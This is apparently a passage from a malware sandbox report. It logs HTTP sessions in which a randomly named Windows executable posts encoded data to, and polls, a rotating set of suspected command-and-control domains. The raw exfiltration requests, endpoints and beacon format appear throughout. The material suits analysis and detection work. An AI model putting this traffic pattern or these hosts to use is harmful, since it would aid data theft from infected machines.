                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 50011 | 156.226.22.233 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:02.533385992 CET | 534 | OUT | GET /moqb/?TTd=yRNPZBU8fZA&mnYxMt=5S0MhnNpk6MkkLalRnUZdzXeRbBtBDflj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsQmQr2N8nNBPzMWj0VDcmFp5Ede8h+DqCqOrnQWhCDltJQ== HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:36:03.491436958 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:03 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 50012 | 52.20.84.62 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:09.066406012 CET | 785 | OUT | POST /esft/ HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.luxe.guru
                                                                                                                                                            Referer: http://www.luxe.guru/esft/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=rXgWPg4TpnazeBq+3R+mHlcL7VYGPRtTqy+IKzz612qEJUhVJINnnw7GAlpMMbT1YuTYBhBw9hrIjPAy5FPJ/nSkTMojcZ8nKSfnYhc5iBt6j3Oiam5ioGuQ+B8FQSzE/69PREREvwhbjme48wjLWvvz2RnPPF7n7jCsMbYPkEFZCMF1lovbn87h+dGKS/+mLXLUzLo=
Nov 12, 2024 18:36:09.724383116 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:09 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f791b-cbab"
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 50013 | 52.20.84.62 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:11.619322062 CET | 805 | OUT | POST /esft/ HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.luxe.guru
                                                                                                                                                            Referer: http://www.luxe.guru/esft/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=rXgWPg4TpnazMxa+2yWmPlcIilYGVhtXqy6IK2Lq1AyEK0xVIJNngw7GPFpDD7TqYuenBg9w9iXIjOwy5ybIlXScKcotYZ8nKSfnYhhciCd6iH+iL35lgmuT7B8FBCz+/68aRHUhvzJbjnu49lPIcvu4oRmkGki7hSGQNJEKgFxxH6of/Kndk8TK+eu8XIjOR0bktc+MraSbA0fZsYAUZa6/Fa/m
Nov 12, 2024 18:36:12.298301935 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:12 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f77fd-cbab"
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 50014 | 52.20.84.62 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:14.161725044 CET | 1822 | OUT | POST /esft/ HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.luxe.guru
                                                                                                                                                            Referer: http://www.luxe.guru/esft/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]
Nov 12, 2024 18:36:14.833102942 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:14 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f77fe-cbab"
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 50015 | 52.20.84.62 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:16.703464031 CET | 534 | OUT | GET /esft/?mnYxMt=mVI2MUxphHC6Uw3exRyeaSUO625HWiZjnHyqF3bL23emPksaKYEAojmfDw0HEL3vY5GLDWVdtCqn7MAr+1mql2O8Aqc8K+kCLQXJA3QmiA5LkgCXPGJmunOEg2Q+Wwqggw==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:36:17.394593954 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:17 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f77ff-cbab"
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 53751 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:23.742079020 CET | 809 | OUT | POST /frw6/ HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.digitalbloom.info
                                                                                                                                                            Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=ZEfNzSM6YnFyLbX9lm9o8vDODwAaDbdU9cP0s3TxSyd4BBXIRtG79YxbMjXeSd+IyI8i2e6omhCE6UqfvwZupASX9yB3qOH+raDmTJSWtsFEvURJY+JzjY8S7e5zrBvwGalrVH3rhzXASoorihELspGGJu9Dg7ngdn2TKZccWTJGW7L5/3P5n+gqTCf7QnqtpFEgR2s=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 53752 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:26.288425922 CET | 829 | OUT | POST /frw6/ HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.digitalbloom.info
                                                                                                                                                            Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=ZEfNzSM6YnFyK4P9pllor/DRMQAaJ7cf9cD0s2WqSk14PErIDv+7oYxbEDXbMt+PyIwq2cuomhGE6VafvDBtrQSvhyAx3+H+raDmTN64tstEskBJZfJyp48Rz+5z8xv0GakbVD+whxfAStMriwEM5ZGAU+88h4avDQOxO60+ZCZ9XNmTlVH/k+IBTB3NVQ3FzmUQPh5qb1jpFVXTw4LAIyneq2DB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 53753 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:28.833564043 CET | 1846 | OUT | POST /frw6/ HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.digitalbloom.info
                                                                                                                                                            Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=ZEfNzSM6YnFyK4P9pllor/DRMQAaJ7cf9cD0s2WqSk94P2TIRO+7uoxbbzXaMt+SyIou2ciCmnaE63Sfp21thQSv5yAhqOGmrZr6TJW4tstEsi9JP+JymY8S7e50rBvMGbNjVD6gmA/ActcrlGwM75GCX+8kh4XvDQ6XO7AEZEp9Wsb/9EDm6fMPSgqrbhCpx3oEJWNRbz3YTWHF67eZTTbJvzm0MgVYLeubLsjehY8X0LJbU7LAn/YV3gaxB0IebZQJ8eUTOcKqy/zA5XVuCzThO+Ddc3Yk5e8gPbs2CRUq+6lojec1MZJdjSYQ2fbAEs5RT+Nu8aAbQzDgDxBP99Z5LnmwRokImpPCPs3r2HTJpvQM9pg/HLYcWZXx/2kzLymqT9nxqYikqJlTFfykcKzwsEcNtVl+FRqGrL8y2u5Atj8JaCvM7H6gcOrq2YnQB6GbU5KeDZ4NFVcjHTomV/PDx2sxeEYXfxrvwQt/m6W1xzf3JQRZnxs3GnH7wgIgLcCr3krD6tVKjK8fg6sI4Q2PSQPekXAmEgUAqCXnr7MSsO9+JtYlgLOBNHS9XZaKkEW7/pwp67G3miCMKKAkpFYZzMmIZ3vvdM6SUP5lNC7HhaVghfhFi3r145jAVkIAzlFZy4UNAe0cR0kLmv2ATYlp+KleLxhjj/fcT4znL8kBguZPVsL72f8VFfE9ftjzU2xRHAAuD1+0oGF+SrxSNlM6x75YRKbM9196xfyVMZuK/34q6Uc5uNm/F2k/nOOPj0bEqnp+Jb4c5CTRUlZn+oFjHm15MxcjSr1lDXdR/JiZxGzJJ9807sCyulMhOxpFsSU/B44fbfnuLyahRDyXEoq8b8qWAQ7cQ+j0UKWnMBNahhNhuGfuyk15sDDWypJN3eZbVvJRR1FNESvlKzl3J5Eqs6z2X6+B2Pj/4/EzxOp4omPHMHHLYclxpTHJEiBjX3KtRRa2CNGyjYqqm6ywsHqfSMMB/FXtv89ll2ShPRocu [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 53754 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:31.387521029 CET | 542 | OUT | GET /frw6/?mnYxMt=UG3twl1RTWICP6a/gHNO8KHNMAUFMYd04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRyja311ZOzbuI/6XNArj8rsZzk05Ib+oXtNARvJ557jq8EQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:36:32.030256987 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:31 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=UG3twl1RTWICP6a/gHNO8KHNMAUFMYd04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRyja311ZOzbuI/6XNArj8rsZzk05Ib+oXtNARvJ557jq8EQ==&TTd=yRNPZBU8fZA"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 53755 | 142.250.185.179 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:37.348830938 CET | 809 | OUT | POST /5ab9/ HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.amitayush.digital
                                                                                                                                                            Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=cI34pYOAGglcwxzuwsXRkYSpTRhlj3YD1DnJLKmW2MR5qPyg4F5xp2RjxAohhmW6XNHX4qwnaRv0MbeUwTp9cOfr4gB5bx9XhrreyPwUVW/MwzHAsu0SyzUIxh3RNV+A03bIgxS2gY0jvK9MtwrepLL0PHlo+9dkQ6apYkZFvcH1qlva+aOeebGkH3aw++0uZ4StVTQ=
Nov 12, 2024 18:36:38.279871941 CET | 407 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:38 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 53756 | 142.250.185.179 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:39.898668051 CET | 829 | OUT | POST /5ab9/ HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.amitayush.digital
                                                                                                                                                            Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=cI34pYOAGglcxS7uyLDRj4SmcxhlqXYH1DrJLILL3+l5quCg7E5xq2Rj+gprlmWhXNCk4u0naRr0MbOUzgB+T+ft+gB7fx9XhrreyP1xVXXMwAvA+7AV8TUXyh3RJV+E03atgwOMga8jvKtMthrZzbLyDXkh+s49eIi1T2d+xOHgvTCwk4GYdbuPH0yG7JpGDbCdLEFedm/yWDrSoX+0M2g4LEB5
Nov 12, 2024 18:36:40.875412941 CET | 407 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:40 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 53757 | 142.250.185.179 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:42.445817947 CET | 1846 | OUT | POST /5ab9/ HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.amitayush.digital
                                                                                                                                                            Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]
Nov 12, 2024 18:36:43.443495989 CET | 407 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:43 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 53758 | 142.250.185.179 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:44.985394001 CET | 542 | OUT | GET /5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HK3o+HppIUB4jPHNr8oJc0/dyFD8r5IhzQkmiC+XTwnzrQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
